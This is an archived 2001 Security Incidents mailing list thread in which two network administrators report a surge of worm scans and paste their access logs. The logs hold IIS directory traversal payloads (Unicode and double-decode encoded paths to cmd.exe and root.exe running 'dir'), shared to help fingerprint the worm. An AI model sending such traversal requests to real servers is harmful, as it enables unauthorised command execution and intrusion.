Security Incidents mailing list archives

Re: CodeBlue finally hitting, or what?

From: Jason Giglio <jgiglio () netmar com>
Date: Tue, 18 Sep 2001 11:36:35 -0400

I've gotten 721 hits just today for cmd.exe of some sort.  We run apache so
no worries, but this worm has hit faster than anything I've seen before.

All from the people that share the same class A as us.  This one must scan
it's own class C then B then A first.  (I know I'm probably abusing the
terms, but you all know what I mean)


65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320





On 2001.09.18 10:24 "Portnoy, Gary" wrote:

Greetings,

I am suddenly seeing hundreds of Unicode traversal requests coming in
from
all over the world, many of them from previous CodeRed victims.  I am
guessing someone changed CodeBlue to make it spread faster, because
before I
saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least
20
in the last hour.  Just a a way to help fingerprint it, a few of the
attempted exploits use the multiple decode vulnerability....

-Gary-

12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET
/scripts/root.exe?/c+dir
HTTP/1.0" 404 287 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
/MSADC/root.exe?/c+dir
HTTP/1.0" 404 285 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
"-"
12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
"-"
"-"
12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
"-"

Gary Portnoy
Network Administrator
gportnoy () belenosinc com

PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

--
Jason Giglio
Information Technology Coordinator, Smyth Companies, Bedford VA
Phone: 540-586-2311x113
e-mail: jgiglio () smythco com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

CodeBlue finally hitting, or what? Portnoy, Gary (Sep 18)
- Re: CodeBlue finally hitting, or what? Eric Jacobsen (Sep 18)
- Re: CodeBlue finally hitting, or what? Jason Giglio (Sep 18)
- Re: CodeBlue finally hitting, or what? Tracey Losco (Sep 18)
- Re: CodeBlue finally hitting, or what? Nick FitzGerald (Sep 18)
- <Possible follow-ups>
- RE: CodeBlue finally hitting, or what? Becky Pinkard (Sep 18)